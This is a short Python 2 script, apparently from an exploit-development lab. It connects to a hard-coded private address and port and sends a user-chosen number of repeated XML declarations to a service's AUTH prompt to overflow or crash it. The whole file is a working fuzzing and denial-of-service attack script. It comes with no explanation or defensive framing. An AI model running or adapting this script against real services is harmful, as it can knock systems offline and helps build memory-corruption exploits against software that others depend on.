#!/usr/bin/python
import socket
server = '10.11.4.94'
sport = 49368

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack length ", length, ' to AUTH .'
attack = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>' * length
s.send((attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
